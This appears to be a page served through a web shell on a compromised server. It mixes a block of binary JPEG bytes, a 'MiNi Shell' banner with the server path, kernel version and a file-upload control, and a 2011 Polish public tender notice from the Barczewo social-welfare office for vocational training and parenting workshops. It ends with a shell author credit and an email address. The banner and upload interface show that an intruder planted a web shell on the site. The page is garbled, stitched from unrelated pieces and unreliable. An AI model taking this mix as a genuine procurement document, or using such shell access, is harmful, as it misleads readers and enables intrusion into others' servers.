JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110502/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110502/98054-N-2011.html

<p class="kh_header"><b>Barczewo: Instrumenty aktywizacji zawodowej, szkolenia podnoszące kwalifikacje zawodowe, Szkoła dla rodziców oraz wsparcie w ramach PAL-u dla osób z terenu Miasta i Gminy Barczewo w ramach Projektu pt.: Aktywni po latach. Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez Ośrodki Pomocy Społecznej. Projekt jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013., współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 98054 - 2011; data zamieszczenia: 02.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Barczewie , ul. Słowackiego 5, 11-010 Barczewo, woj. warmińsko-mazurskie, tel. 0-89 5149798, faks 0-89 5149799.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.barczewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Instrumenty aktywizacji zawodowej, szkolenia podnoszące kwalifikacje zawodowe, Szkoła dla rodziców oraz wsparcie w ramach PAL-u dla osób z terenu Miasta i Gminy Barczewo w ramach Projektu pt.: Aktywni po latach. Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez Ośrodki Pomocy Społecznej. Projekt jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013., współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
w części I - Instrumenty aktywizacji zawodowej - 
1)	indywidualne doradztwo zawodowe -prowadzone w formie konsultacji indywidualnych 
(2 godz. na os.- 31 osób), prowadzone przez wykwalifikowanych doradców zawodowych, stosujących najnowsze metody pozwalające na określanie zasobów i deficytów klienta oraz na wyznaczanie kierunku jego dalszego rozwoju zawodowego, 
2)	dla każdego uczestnika zostanie opracowany IPD - indywidualny plan działania 
(2 godz. na osobę- 31 osób),
w części II - szkolenia podnoszące kwalifikacje zawodowe: 
1)	WIZAŻ ZE STYLIZACJĄ PAZNOKCI dla 10 osób (razem 120h). Program kursu musi zawierać m.in. następujące zagadnienia: analiza kolorystyczna, techniki wykonywania profesjonalnego wizażu, makijaż dzienny, wieczorowy, ślubny, kobiety dojrzałej, budowa i choroby paznokcia, manicure, techniki zdobienia paznokci. Szkolenie powinno kończyć się egzaminem wewnętrznym. 
2)	Język angielski dla początkujących - podstawy potrzebne na rynku pracy Unii Europejskiej - 60h na gr./ 2 grupy. (razem 120h). Program powinien zawierać m.in.: alfabet, konstrukcja zdania, przedstawianie się, liczebniki, godziny-podanie czasu, czas teraźniejszy ciągły, proste zdania dotyczące codziennego życia. 
3)	Instrument aktywności społecznej - budżet domowy - podstawy zarządzania domowym budżetem- warsztaty pomocowo- edukacyjne - 24h na gr./3 gr. (razem 72h). Program powinien zawierać m.in.: budżet - tworzenie budżetu domowego, efektywne oszczędzanie, psychologia konsumenta - zasady kupowania, pułapki marketingowe, podstawowe prawa konsumenta, zarządzanie domowym budżetem.
4)	Zarządzanie czasem i planowanie pracy - warsztaty pomocowo- edukacyjne - 20h na gr. /3 gr.(razem 60h). Celem szkolenia jest dostarczenie wiedzy i praktycznych wskazówek dotyczących organizacji pracy własnej i współpracowników oraz wypracowanie i wyćwiczenie metod nowoczesnego działania w tym zakresie. Zajęcia powinny pozwolić uczestnikom zidentyfikować trudności we właściwym wykorzystaniu czasu pracy oraz wypracować własne zasady zarządzania czasem.
5)	Nie pozwól się wykorzystywać w pracy i życiu codziennym - Asertywność, czyli jak mówić nie - 20h na gr./3 gr.(razem 60h). 
6)	Warsztat aktywizacji zawodowej - warsztaty z zakresu aktywnego poruszania się po rynku pracy prowadzone są w formie grupowej - 30h na gr./3 gr. (razem 90h). 
7)	Warsztaty zakładania spółdzielni socjalnej wraz z wyjazdem studyjnym - 30h na 3 gr. (razem 90h)
w części III - szkoła dla rodziców dla jednej grupy 20 osób (rodzice / opiekunowie prawni) niewydolnych wychowawczo razem 40h. Jego głównym celem jest wspieranie rodziców i wychowawców w radzeniu sobie w codziennych kontaktach z dziećmi i młodzieżą. Cel kursu jest ogólny tj. nabycie umiejętności wychowawczych niezbędnych w pracy wychowawczej z dzieckiem, przygotowanie wychowawców i rodziców do zmiany postaw wychowawczych, zmiany komunikacji interpersonalnej z dzieckiem i innymi dorosłymi.
w części IV - Zajęcia oraz warsztaty w PAL będą prowadzone w formie wyjazdowej. Na tym etapie nie określamy miejsca świadczenia usługi, powyższe należy do obowiązków wykonawcy.  W ramach PAL uczestnicy (grupa 26 osób) skorzystają z następujących form wsparcia : 
1) Video CV - coraz popularniejszy sposób tworzenia CV - nagranie na płycie CD. Każdy uczestnik zakończy taki kurs płytą z nagranym swoim CV (max. 3 minuty) - 15h na gr./ 2gr. (razem 30h) 
2) Siłą bez agresji - trening zachowań interwencyjnych z elementami samoobrony 12h na gr. /2 gr. (razem 24h) 
3) Nie daj się wykluczyć informacyjnie, pierwszy zdobądź informacje - nowe technologie pozyskiwania informacji Od tabliczki glinianej do bloga 20h na gr. /2gr. (razem 40h)
4) Uwierz w siebie, daj sobie szansę - zwiększenie poczucia własnej wartości kluczem do znalezienia pracy 20h na gr./2gr. (razem 40h)
5) Wolontariat źródłem doświadczenia zawodowego dla młodzieży 20 h na gr./2 gr. (razem 40h) 
2.	Zajęcia w części I, II i III muszą odbywać się w godzinach 8.00-13.00 na terenie Miasta Barczewo. Uczestnikom przysługuje w czasie zajęć 15 minutowa przerwa kawowa.
3.	W odniesieniu do wszystkich szkoleń i warsztatów wykonawca zapewni dla każdego beneficjenta niezbędne materiały piśmiennicze do warsztatów aktywizacji zawodowej (segregator, notatnik formatu A4, dwa długopisy, 2 ołówki, mazak fluorescencyjny, temperówka, gumka,) jak również suchy catering w postaci kawa, herbata, woda, sok, ciastka. W ramach PAL (część IV) wykonawca zapewni dojazd uczestników. 
4.	Harmonogram zajęć powinien być tak ustalony by zajęcia odbywały się w ciągu kolejnych następujących po sobie dni.
5.	Wykonawca jest zobowiązany: 
6.	1) przeprowadzić szkolenie zgodnie ze złożoną ofertą, wymaganiami i warunkami określonymi w przedmiocie zamówienia, 
2) oznakować wszelką dokumentację związaną z realizacją umowy zgodnie z wytycznymi Zamawiającego oraz z Wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki znajdującymi się na stronie www.efs.gov.pl, 
3) opracować i dołączyć przed podpisaniem umowy szczegółowy program szkolenia 
4) opracować harmonogram przeprowadzenia szkolenia/warsztatów z określeniem czasu jego trwania z uwzględnieniem wszystkich godzin kursu zgodny z programem szkolenia i przedłożyć przed podpisaniem umowy, 
5) dostarczyć w dniu rozpoczęcia zajęć uczestnikom szkolenia niezbędne materiały szkoleniowe, pomoce dydaktyczne w tym materiały biurowe
6) przekazać jeden komplet materiałów szkoleniowych Zamawiającemu
7) niezwłocznie informować na piśmie Zamawiającego o nieobecności uczestnika na szkoleniu lub rezygnacji z uczestnictwa w nim,
8) wydać zaświadczenia o ukończeniu kursu/szkolenia potwierdzającego zakres szkolenia oraz umiejętności uprawnienia zdobyte w związku z ukończeniem kursu/szkolenia. Wydane zaświadczenie powinno obowiązkowo zawierać dodatkowe informacje o współfinansowaniu w ramach POKL oraz LOGO UE, EFS
9) przeprowadzić na zakończenie szkolenia badania ankietowe uczestników szkolenia dotyczące poziomu zawartości merytorycznej oraz jakości prowadzonych zajęć. Ankieta ta winna posiadać metryczkę (wzór ankiety należy dołączyć celem zatwierdzenia przed podpisaniem umowy),.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 80.53.00.00-8, 80.58.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający żąda wykazania, iż Wykonawca dysponuje:
w części I - minimum 1 osobą, która przeszkoliła co najmniej 30 osób z zakresu indywidualnego doradztwa zawodowego oraz opracowała IPD dla co najmniej 30 osób;
w części II - minimum 1 osobą, posiadającą uprawnienia do przeprowadzania szkoleń, egzaminowania oraz nadawania uprawnień z zakresu przedłużania paznokci, która ukończyła certyfikowany kurs stylizacji ślubnej, zabiegów laserowych, pilingów chemicznych w zabiegach twarzy i ciała, zakładania metalowych klamer na wrastające paznokcie oraz posiadającą uprawnienia do pobierania materiałów do badań dermatologicznych, która posiada doświadczenie jako nauczyciel prowadzący zajęcia w szkole na kierunku kosmetologia z elementami wizażu,
- minimum 1 osobą, posiadającą uprawnienia do przeprowadzania szkoleń z zakresu języka angielskiego oraz posiada doświadczenie, w tym przeprowadziła jedno szkolenie podnoszące kwalifikacje w posługiwaniu się językiem angielskim dla min. 10 osób,
- minimum 1 osobą, która przeprowadziła jedne warsztaty pomocowo-edukacyjne dotyczące zarządzania domowym budżetem dla min. 10 osób oraz posiada minimum roczne doświadczenie w pracy z osobami bezrobotnymi,
- minimum 1 osobą, która przeprowadziła jedne warsztaty pomocowo-edukacyjne dotyczące zarządzaniem czasem i planowaniem pracy dla min. 10 osób oraz posiada minimum roczne doświadczenie w pracy z osobami bezrobotnymi,
- minimum 1 osobą, która przeprowadziła jedno szkolenie dotyczące asertywności dla min. 10 osób oraz posiada minimum roczne doświadczenie w pracy z osobami bezrobotnymi,
- minimum 1 osobą posiadającą wykształcenie wyższe nauczycielskie (preferowane humanistyczne) która ukończyła szkołę trenerów trwającą co najmniej dwa semestry zakończoną egzaminem,  która przeprowadziła co najmniej 100 godzin podobnych zajęć;  
w części III - minimum 1 osobą posiadającą  wykształcenie wyższe w kierunku pedagogicznym, która posiada ukończone kursy, warsztaty, seminaria dla realizatorów programu Szkoła dla rodziców (lub równoważny), która przeprowadziła co najmniej jedno szkolenie z zakresu Szkoły dla rodziców dla min. 15 osób;
w części IV - minimum 1 osobą posiadającą  legitymację instruktora samoobrony oraz minimum 1 osobą posiadającą wykształcenie wyższe pedagogiczne, która posiada doświadczenie w prowadzeniu zajęć z młodzieżą gimnazjalną i licealną oraz w zarządzaniu wolontariuszami w organizacji;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Jakość zaproponowanych usług - 60</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ceny jednostkowe nie mogą ulec zmianie w trakcie obowiązywania umowy, za wyjątkiem zmiany obowiązującej stawki podatku VAT. Umowa ulegnie zmianie w zakresie zmiany obowiązującej stawki podatku VAT oraz wartości brutto przy zachowaniu niezmiennych cen jednostkowych netto przedmiotu zamówienia oraz wartości netto umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.barczewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Barczewie, ul. Słowackiego 5, 11-010 Barczewo, adres e-mail:  kis2005@wp.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2011 godzina 15:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Barczewie, ul. Słowackiego 5, 11-010 Barczewo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie w ramach Projektu pt.: Aktywni po latach. Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez Ośrodki Pomocy Społecznej. Projekt jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013., współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Instrumenty aktywizacji zawodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	indywidualne doradztwo zawodowe -prowadzone w formie konsultacji indywidualnych 
(2 godz. na os.- 31 osób), prowadzone przez wykwalifikowanych doradców zawodowych, stosujących najnowsze metody pozwalające na określanie zasobów i deficytów klienta oraz na wyznaczanie kierunku jego dalszego rozwoju zawodowego, 
2)	dla każdego uczestnika zostanie opracowany IPD - indywidualny plan działania 
(2 godz. na osobę -31 osób),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość zaproponowanych usług - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> szkolenia podnoszące kwalifikacje zawodowe:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	WIZAŻ ZE STYLIZACJĄ PAZNOKCI dla 10 osób (razem 120h). Program kursu musi zawierać m.in. następujące zagadnienia: analiza kolorystyczna, techniki wykonywania profesjonalnego wizażu, makijaż dzienny, wieczorowy, ślubny, kobiety dojrzałej, budowa i choroby paznokcia, manicure, techniki zdobienia paznokci. Szkolenie powinno kończyć się egzaminem wewnętrznym. 
2)	Język angielski dla początkujących - podstawy potrzebne na rynku pracy Unii Europejskiej - 60h na gr./ 2 grupy. (razem 120h). Program powinien zawierać m.in.: alfabet, konstrukcja zdania, przedstawianie się, liczebniki, godziny-podanie czasu, czas teraźniejszy ciągły, proste zdania dotyczące codziennego życia. 
3)	Instrument aktywności społecznej - budżet domowy - podstawy zarządzania domowym budżetem- warsztaty pomocowo- edukacyjne - 24h na gr./3 gr. (razem 72h). Program powinien zawierać m.in.: budżet - tworzenie budżetu domowego, efektywne oszczędzanie, psychologia konsumenta - zasady kupowania, pułapki marketingowe, podstawowe prawa konsumenta, zarządzanie domowym budżetem.
4)	Zarządzanie czasem i planowanie pracy - warsztaty pomocowo- edukacyjne - 20h na gr. /3 gr.(razem 60h). Celem szkolenia jest dostarczenie wiedzy i praktycznych wskazówek dotyczących organizacji pracy własnej i współpracowników oraz wypracowanie i wyćwiczenie metod nowoczesnego działania w tym zakresie. Zajęcia powinny pozwolić uczestnikom zidentyfikować trudności we właściwym wykorzystaniu czasu pracy oraz wypracować własne zasady zarządzania czasem.
5)	Nie pozwól się wykorzystywać w pracy i życiu codziennym - Asertywność, czyli jak mówić nie - 20h na gr./3 gr.(razem 60h). 
6)	Warsztat aktywizacji zawodowej - warsztaty z zakresu aktywnego poruszania się po rynku pracy prowadzone są w formie grupowej - 30h na gr./3 gr. (razem 90h). 
7)	Warsztaty zakładania spółdzielni socjalnej wraz z wyjazdem studyjnym - 30h na 3 gr. (razem 90h).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0, 80.58.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość zaproponowanych usług - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> szkoła dla rodziców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szkoła dla rodziców dla jednej grupy 20 osób (rodzice / opiekunowie prawni) niewydolnych wychowawczo razem 40h. Jego głównym celem jest wspieranie rodziców i wychowawców w radzeniu sobie w codziennych kontaktach z dziećmi i młodzieżą. Cel kursu jest ogólny tj. nabycie umiejętności wychowawczych niezbędnych w pracy wychowawczej z dzieckiem, przygotowanie wychowawców i rodziców do zmiany postaw wychowawczych, zmiany komunikacji interpersonalnej z dzieckiem i innymi dorosłymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość zaproponowanych usług - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia oraz warsztaty w ramach PAL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia oraz warsztaty w ramach PAL będą prowadzone w formie wyjazdowej. Na tym etapie nie określamy miejsca świadczenia usługi, powyższe należy do obowiązków wykonawcy.  W ramach PAL uczestnicy (grupa 26 osób) skorzystają z następujących form wsparcia : 
1) Video CV - coraz popularniejszy sposób tworzenia CV - nagranie na płycie CD. Każdy uczestnik zakończy taki kurs płytą z nagranym swoim CV (max. 3 minuty) - 15h na gr./ 2gr. (razem 30h) 
2) Siłą bez agresji - trening zachowań interwencyjnych z elementami samoobrony 12h na gr. /2 gr. (razem 24h) 
3) Nie daj się wykluczyć informacyjnie, pierwszy zdobądź informacje - nowe technologie pozyskiwania informacji Od tabliczki glinianej do bloga 20h na gr. /2gr. (razem 40h)
4) Uwierz w siebie, daj sobie szansę - zwiększenie poczucia własnej wartości kluczem do znalezienia pracy 20h na gr./2gr. (razem 40h)
5) Wolontariat źródłem doświadczenia zawodowego dla młodzieży 20 h na gr./2 gr. (razem 40h).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość zaproponowanych usług - 60</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com